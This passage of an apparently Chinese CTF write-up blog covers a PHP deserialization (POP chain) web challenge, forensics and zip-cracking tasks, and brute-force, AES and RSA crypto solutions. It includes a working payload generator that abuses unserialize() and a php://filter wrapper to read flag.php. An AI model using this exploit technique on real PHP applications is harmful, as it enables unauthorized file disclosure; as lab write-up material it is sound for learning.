</span></span><span class="line"><span class="cl"><span class="k">if</span><span class="p">(</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;pop&#39;</span><span class="p">])){</span>
</span></span><span class="line"><span class="cl">    <span class="o">@</span><span class="nx">unserialize</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;pop&#39;</span><span class="p">]);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$a</span><span class="o">=</span><span class="k">new</span> <span class="nx">Show</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="nx">highlight_file</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>思路：通过 Show 让 Modifier 来 include flag.php</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="o">&lt;?</span><span class="nx">php</span>
</span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">Modifier</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">protected</span> <span class="nv">$var</span><span class="o">=</span><span class="s1">&#39;php://filter/read=convert.base64-encode/resource=flag.php&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">Show</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$source</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$str</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__construct</span><span class="p">(</span><span class="nv">$file</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">source</span><span class="o">=</span><span class="nv">$file</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">Test</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$p</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__construct</span><span class="p">(</span><span class="nv">$p</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">p</span><span class="o">=</span><span class="nv">$p</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="nv">$show1</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">Show</span><span class="p">(</span><span class="s1">&#39;add&#39;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="nv">$show2</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">Show</span><span class="p">(</span><span class="nv">$show1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="nv">$m</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">Modifier</span><span class="p">();</span>
</span></span><span class="line"><span class="cl"><span class="nv">$test</span><span class="o">=</span> <span class="k">new</span> <span class="nx">Test</span><span class="p">(</span><span class="nv">$m</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="nv">$show1</span><span class="o">-&gt;</span><span class="na">str</span><span class="o">=</span><span class="nv">$test</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="k">echo</span> <span class="nx">urlencode</span><span class="p">(</span><span class="nx">serialize</span><span class="p">(</span><span class="nv">$show2</span><span class="p">));</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>base64解码就是flag.php的源码了</p>
<p><img src="https://img-blog.csdnimg.cn/20200327220116942.png" alt="" /></p>
<h3 id="ezpop_revenge">Ezpop_Revenge</h3>
<h2 id="2020安洵杯misccrypto-writeup">2020安洵杯Misc&amp;Crypto writeup</h2>
<p>总体感觉题目没啥营养，全是出烂了的考点，不过还是水个博客。</p>
<h3 id="misc-2">Misc</h3>
<h4 id="签到-1">签到</h4>
<p>一个二维码，扫描关注公众号，恢复flag会给个假的flag，根据hint回复fl4g，得到网盘链接，里面是个word，word里是emoji，不是emojicode，base100解密就是flag</p>
<h4 id="王牌特工">王牌特工</h4>
<p>磁盘取证，一个<code>findme</code>文件，是<code>ext3</code>，挂载得到一个 <code>flagbox</code> 和一个<code>key.txt</code>提示如下</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">key:a_cool_key
</span></span><span class="line"><span class="cl">use Veracrypt
</span></span></code></pre></td></tr></table>
</div>
</div><p>用<code>Veracrypt</code>挂载<code>flagbox</code>，一个假flag文件，提示往回看</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">extundelete findme --restore-all
</span></span></code></pre></td></tr></table>
</div>
</div><p>恢复<code>fideme</code>中删除的文件，得到一个 <code>.coolboy.swp</code> 的<code>vim</code>缓存，得到一串<code>base64：55yf55qE5a+G56CBOnRoaXNfaXNfYV90cnVlX2tleQ==</code>真正的密码 <code>this_is_a_true_key</code>，挂载得到flag</p>
<h4 id="套娃-2">套娃</h4>
<p>zip题，第一层crc爆破得到密码	<code>!qQIdEa@#!z)</code></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">0xea4446b6
</span></span><span class="line"><span class="cl">0xed7987de
</span></span><span class="line"><span class="cl">0x46fe0943
</span></span><span class="line"><span class="cl">0x4be30989
</span></span><span class="line"><span class="cl">0xb31975c0
</span></span><span class="line"><span class="cl">0xd6bb1bef
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="c1"># from network</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">binascii</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">string</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">crack_crc</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">    <span class="n">crc_list</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0xea4446b6</span><span class="p">,</span><span class="mh">0xed7987de</span><span class="p">,</span><span class="mh">0x46fe0943</span><span class="p">,</span><span class="mh">0x4be30989</span><span class="p">,</span><span class="mh">0xb31975c0</span><span class="p">,</span><span class="mh">0xd6bb1bef</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="n">chars</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">printable</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">res_crc</span> <span class="ow">in</span> <span class="n">crc_list</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="k">for</span> <span class="n">str_1</span> <span class="ow">in</span> <span class="n">chars</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="k">for</span> <span class="n">str_2</span> <span class="ow">in</span> <span class="n">chars</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                <span class="n">comment</span> <span class="o">=</span> <span class="n">str_1</span> <span class="o">+</span> <span class="n">str_2</span>
</span></span><span class="line"><span class="cl">                <span class="n">test_crc</span> <span class="o">=</span> <span class="n">binascii</span><span class="o">.</span><span class="n">crc32</span><span class="p">(</span><span class="n">comment</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span>
</span></span><span class="line"><span class="cl">                <span class="n">calc_crc</span> <span class="o">=</span> <span class="n">test_crc</span> <span class="o">&amp;</span> <span class="mh">0xffffffff</span>
</span></span><span class="line"><span class="cl">                <span class="k">if</span> <span class="n">calc_crc</span> <span class="o">==</span> <span class="n">res_crc</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                    <span class="nb">print</span><span class="p">(</span><span class="n">comment</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">&#39;__main__&#39;</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="n">crack_crc</span><span class="p">()</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>第二层明文攻击，做的时候遇到点问题，密码出来 <code>%3#c$v!@</code> 但是解密文件失败，发现原因了，伪加密去掉就可以正常解密了，或者flag.txt单独拖出来解密也行。</p>
<p>得到一串<code>fgic__notl{prwc__}az&amp;ceadi@</code>，在线解栅栏得到<code>flag{zip&amp;crc_we_can_do_it}@</code></p>
<h4 id="becare4">BeCare4</h4>
<p>拿了个一血，这题到最后都450分+是我没想到的</p>
<p>一个文本，想百度找找文章出处，粘贴的时候发现是零宽字节，得到压缩包密码</p>
<pre tabindex="0"><code>oh,you found the pass:RealV1siBle
</code></pre><p>解压后得到图片，直接 <code>silenteye</code> 出flag</p>
<h3 id="crypto-1">Crypto</h3>
<h4 id="密码学爆破就行了">密码学？爆破就行了</h4>
<p>密码签到题，就是爆破，放服务器上跑了一会</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">hashlib</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">string</span> <span class="kn">import</span> <span class="n">ascii_lowercase</span><span class="p">,</span><span class="n">digits</span>
</span></span><span class="line"><span class="cl"><span class="n">table</span> <span class="o">=</span> <span class="n">ascii_lowercase</span><span class="o">+</span><span class="n">digits</span>
</span></span><span class="line"><span class="cl"><span class="n">ciphier</span> <span class="o">=</span> <span class="s1">&#39;0596d989a2938e16bcc5d6f89ce709ad9f64d36316ab80408cb6b89b3d7f064a&#39;</span>
</span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">a</span> <span class="ow">in</span> <span class="n">table</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="n">table</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">table</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="k">for</span> <span class="n">d</span> <span class="ow">in</span> <span class="n">table</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                <span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">table</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                    <span class="k">for</span> <span class="n">f</span> <span class="ow">in</span> <span class="n">table</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                        <span class="n">flag</span> <span class="o">=</span> <span class="s1">&#39;d0g3{71b2b5616&#39;</span><span class="o">+</span><span class="n">a</span><span class="o">+</span><span class="n">b</span><span class="o">+</span><span class="s1">&#39;2a4639&#39;</span><span class="o">+</span><span class="n">c</span><span class="o">+</span><span class="n">d</span><span class="o">+</span><span class="s1">&#39;7d979&#39;</span><span class="o">+</span><span class="n">e</span><span class="o">+</span><span class="n">f</span><span class="o">+</span><span class="s1">&#39;de964c}&#39;</span>
</span></span><span class="line"><span class="cl">                        <span class="n">tmp</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">sha256</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">                        <span class="k">if</span> <span class="n">tmp</span> <span class="o">==</span> <span class="n">ciphier</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                            <span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                            <span class="n">exit</span><span class="p">()</span>
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">d0g3<span class="o">{</span>71b2b5616ee2a4639a07d979ebde964c<span class="o">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="easyaes">easyaes</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="o">*</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span>
</span></span><span class="line"><span class="cl"><span class="n">msg</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;Welcome to this competition, I hope you can have fun today!!!!!!&#39;</span>
</span></span><span class="line"><span class="cl"><span class="n">hint_key</span> <span class="o">=</span> <span class="mi">56631233292325412205528754798133970783633216936302049893130220461139160682777</span>
</span></span><span class="line"><span class="cl"><span class="n">last32</span> <span class="o">=</span> <span class="s1">&#39;3c976c92aff4095a23e885b195077b66&#39;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># print(hex(hint_key))</span>
</span></span><span class="line"><span class="cl"><span class="c1"># 0x7d3424647d3424647d3424647d34246419044357064341081e5b4901045b5119L</span>
</span></span><span class="line"><span class="cl"><span class="n">hint</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="n">hint_key</span><span class="p">)[</span><span class="mi">2</span><span class="p">:</span><span class="mi">10</span><span class="p">]</span><span class="o">*</span><span class="mi">8</span>
</span></span><span class="line"><span class="cl"><span class="n">key</span> <span class="o">=</span> <span class="n">hint_key</span><span class="o">^</span><span class="nb">eval</span><span class="p">(</span><span class="s1">&#39;0x&#39;</span><span class="o">+</span><span class="n">hint</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">key</span> <span class="o">=</span> <span class="n">long_to_bytes</span><span class="p">(</span><span class="n">key</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;key:&#34;</span><span class="o">+</span><span class="n">key</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="c1"># d0g3{welcomeyou}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">aes</span><span class="o">=</span><span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span><span class="n">AES</span><span class="o">.</span><span class="n">MODE_ECB</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">tmp</span> <span class="o">=</span> <span class="n">long_to_bytes</span><span class="p">(</span><span class="mh">0x3c976c92aff4095a23e885b195077b66</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">tmp</span> <span class="o">=</span> <span class="n">aes</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">tmp</span> <span class="o">=</span> <span class="n">long_to_bytes</span><span class="p">(</span><span class="n">bytes_to_long</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span> <span class="o">^</span> <span class="n">bytes_to_long</span><span class="p">(</span><span class="n">msg</span><span class="p">[</span><span class="mi">16</span><span class="o">*</span><span class="p">(</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">):</span><span class="mi">16</span><span class="o">*</span><span class="n">i</span><span class="p">]))</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="easyrsa">easyrsa</h4>
<p>challenge1费马小定理 开方得到m 即p<br />
challenge2签到水平给个hint<code>Flag is a 764-length number that starts with &quot;太长了，就不贴了，自己跑去。&quot;, and CYZ says he can solve the problem if he was given two more numbers</code><br />
challenge3给了flag高位,e很小,CopperSmith解一波<br />
在线的sage跑似乎出了点小问题，解出x没问题，但是最后运算不知道为啥出错，自己把x贴回来然后long_to_bytes就行了<code>ohhhhhhhhhhhhhhhhhhhhhhhh!You are good at math and crypto ,I hope you have fun today.We should think of not only the small plaintext attack, but also the coppersmith attack when e is smallWHAT?You say you only wanna flag and don' want to talk with me .OK,fine!   The flag is :   d0g3{e173c0f114c59c2bdea69c67422be407}</code></p>
<p><img src="https://img-blog.csdnimg.cn/20201127191442597.png" alt="" /></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span><span class="lnt">47
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="o">*</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">gmpy2</span> <span class="kn">import</span> <span class="o">*</span>
</span></span><span class="line"><span class="cl"><span class="c1"># --------------challenge 1-------------</span>
</span></span><span class="line"><span class="cl"><span class="n">n</span> <span class="o">=</span> <span class="mi">10050095014547257781432719892909820612730955980465259676378711053379530637537082959157449310691856567584792956476780977871348290765339769265796235196183464082153542864869953748019765139619014752579378866972354738500054872580260903258315293588496063613299656519940131695232458799137629873477475091085854962677524091351680654318535417344913749322340318860437103597983101958967342493037991934758199221146242955689392875557192192462927253635018175615991531184323989958707271442555251694945958064367263082416655380103916187441214474502905504694440020491633862067243768930954759333735863069851757070183172950390134463839187</span>
</span></span><span class="line"><span class="cl"><span class="n">c</span> <span class="o">=</span> <span class="mi">522627051172673216607019738378749874116772877858344748349627321977492158105699887369893079581450048789131578556338186004983533975454988450450635141267157135506032849129152411194539350100279698888357898902460651973610161382266600081865609650174137113252711515464274593530115825189780860732147803369868525723790644619452538755225868382505974710418995847979384726953915873857530098330095151094837190566851416540540805185485212577333604309698822785682707412587829684108913753204398552196441996201678339688766979634246337855516220753995430266970473808724410357458278585135750810810484678948146374963838334596646926215341</span>
</span></span><span class="line"><span class="cl"><span class="n">hint1</span> <span class="o">=</span> <span class="mi">134805774328615624446574490322803283547316698647214138487576352482438867186094276263735342558169004773286779632939369099910639984165263724781958841009573156241531958373198729926012152201548649349842790727259831232277600944618096069835436884888782994513452252257103877595707828731260669076400456300668581565291455061609385003064649522735776446930209884653223939689686840631001863143579575759834304817613040932998629846110770749941179601474484275548912570668460216633586988225562794026430881265344731575650165992321629617982004131413202026628777742093026476064486873565664625105013298396598413667761372217260994853420062861590358</span>
</span></span><span class="line"><span class="cl"><span class="c1"># hint1 = 2 * d + 246810 * e * phi</span>
</span></span><span class="line"><span class="cl"><span class="n">m</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">c</span><span class="p">,</span><span class="n">hint1</span><span class="p">,</span><span class="n">n</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">m</span> <span class="o">=</span> <span class="n">iroot</span><span class="p">(</span><span class="n">m</span><span class="p">,</span><span class="mi">2</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s1">&#39;m&#39;</span><span class="p">,</span><span class="n">m</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="c1"># 234702123</span>
</span></span><span class="line"><span class="cl"><span class="c1"># --------------challenge 2-------------</span>
</span></span><span class="line"><span class="cl"><span class="n">q</span> <span class="o">=</span> <span class="n">m</span>
</span></span><span class="line"><span class="cl"><span class="n">e</span> <span class="o">=</span> <span class="mh">0x10001</span>
</span></span><span class="line"><span class="cl"><span class="n">n</span> <span class="o">=</span> <span class="mi">133561991523711714238641512987809330530212246892569593026319411449791084194115873781301422593495806927875828290629679020098834182528012835469352471635087375406306534880352693134486855968468946334439553553593196889196239169351375517588892769598963002098115826389220099548938169095670740942251209102500450728442583559710183771974489284632651296188035458586935211952691589627681567274801028577256215269233875203212438263987034556969968774119389693056239796736659926866707857937025200924828822267781445721099763436020785585453958594470906716195030613615725126057391084801585533926767137218524047259398886392592317910204988634868663634415285507325190415658931169841182499733179254162060738994027842088553562013488445789594342451823783136881968032197575016845492231433684884872631894561254381663562267075103417879327236182565223877901300392217967589154857009356640377622996801781797109089687661697856930394706016954531077165127402008444818092498106642068414208190583373314287381712963712098566595399301400378116274132918572709221391531621228936206630829355801192700264684469488261781954165940553346889395507153750291402535330239420975542926664420153925171757944018621411265539452424569343708318070259746118326558005521868356304582694159507379335214599839668805877215983938986674084063185863612335339836810044252829401409522709997562887276661672718820881541500852400369184737236082178767653725044900394959369367604992512713490494168594433000695046297712977059205623777990102604073885527049867682390577577616773090662829024271568456346362315351643767420198116229892060385453123572533267805396437865025639093881944841521458804810097550625853182396288247815370818578103543117466070812804267915674186488979548392193291727228018246788487524292081389142018151246889408421936865224469589631518283230229213787648552632437566756058034131355439709320923876063030896228165897498746898125821639893238387694549304110003941329763552493326245073779912107372271854798616245416264801377068163622812994786201580895459712414134184992440395336131037558976058298521312536969408724436512019410835904564817724243688308776888170183074838453466914170790840559860531933430176605716828492670093771129301541861534595181565621644268739349035133062776852304594204220291667924128313579203359827093150911871520605180797438668872585571501531844999598674037998642821148417473110716470439750642781609483016636419373004760601783594025036152924259863627732874940148083408474700265895269165869619971810103499607445649821</span>
</span></span><span class="line"><span class="cl"><span class="n">p</span> <span class="o">=</span> <span class="mi">689159326758330864205993810270646658558112329195746149991184055909755461246626153920231796960903018393806410715812453949253930576368274228434916375544579284365205241766136566047482065208442992856658212126772417415403473480889927931481129434854332858754668120563818975006384512615022532233244596546830392476321031156328699572283946257730515089543367929326280871305776349305346159311591820455943842203357066465523558715870586535188343603460826231817622511283563179065036619023415848694281294463836320838105950552498785365535923041927491743402053568747113507098917091780797009380675587381805253390649630338055131031679595664055361678114747608302944715308343764678875659039394225950479683967885912291399162609094622980318391045105733088508798371414996479107970975717563552614856114065668728607215268431341079233630995168600896375314067716366181300081684353583326214062788182429536300917720999423489104723824360299238754986351169209709892739317096741609428484854087163771300777717883057028145424827875496235567904291417092378448353222179114362314382900648079547647848024440220204768433974038004942869937932015294078073975703156613070125753344841550872429670559866184492945262960524545894823245933714684747784492095876370443994948425495841</span>
</span></span><span class="line"><span class="cl"><span class="n">c</span> <span class="o">=</span> <span class="mi">65553658155452064459040687299632299415295760116470555100400688788937893101658136830409082198753928673469636810831761104117535054304536941814523449491308187105740319828511969750359402834799486354958723098881095067882833993358468923611118977258293638107874383059048015701807718209929028151240509801801995570592890519253676774278321334154528938199389248563657673061299152526380072934917964488153875744843855913524788571997024947738868563951687976817548296078497817264410193882661874749304071168979787307490320366615899942861059615405569154961435894469325778407081182151320629413711622905703628430999201763846682516985530373643176026602901129520439581385946775511292435206913016381293219606333035648747877313424616408338829137581998558399694071257787294948211441360283876078405831210625321012072477187438320944119825970347654743794743846351762763177440045084761025728597526592892602263484022280653040195670941221493307430623213388669939114424884078502946247136016528925968280034099568454876076717790529204207317485416329062672971939549478648687894958552760953682796211975576320713576155031581257782352223857605149825435939889497465805857339911597479498085071301601506276220487493620870555545057189236870008182212284992968466451864806648279032294546676543599599279519394341289357968292292966055189578253350591765186079486142930848439238134776982658066494378507873003509820326863340562093906137812952544399266821679905073464535234547335867090392493005792528534561846391285698943396889671437127470587837989050518266365099789392584686615435440486086402941357614369171354355307532351370775920044953381482310949663868493911752104873824099597326393857349237228788875273525189373323552519106738497767546337587947368062413334887230166285909705065920918078052826480092129173127887307158867274895914733110276134124505178182548094607594799978378381804502097507167978950926067243870989514735314054362049917668015341349933704885009878192354865067520219676784278082055728039064858769077997521541853184489175120623176481708269464933868222226748491078319156602229948646960513946846417957356535995079525993783278312017766715177078804065822913241465133977233398851120059496221650357891946344151601586169979516826622503491746992282716591488199657450776596383692706657692673860134555990821730412919497018889046615548520878486492644159735144935329502984929679831356967030870226422768447430410031028770529758721438528263719267616233686813781828066547393953352033364851486926368090757420184816634373721</span>
</span></span><span class="line"><span class="cl"><span class="c1"># r = n//q//p</span>
</span></span><span class="line"><span class="cl"><span class="c1"># phi = (p-1)*(q-1)*(r-1)</span>
</span></span><span class="line"><span class="cl"><span class="n">n</span> <span class="o">=</span> <span class="n">n</span><span class="o">//</span><span class="n">q</span>
</span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="n">n</span><span class="o">//</span><span class="n">p</span>
</span></span><span class="line"><span class="cl"><span class="n">phi</span> <span class="o">=</span> <span class="p">(</span><span class="n">p</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">*</span><span class="p">(</span><span class="n">r</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
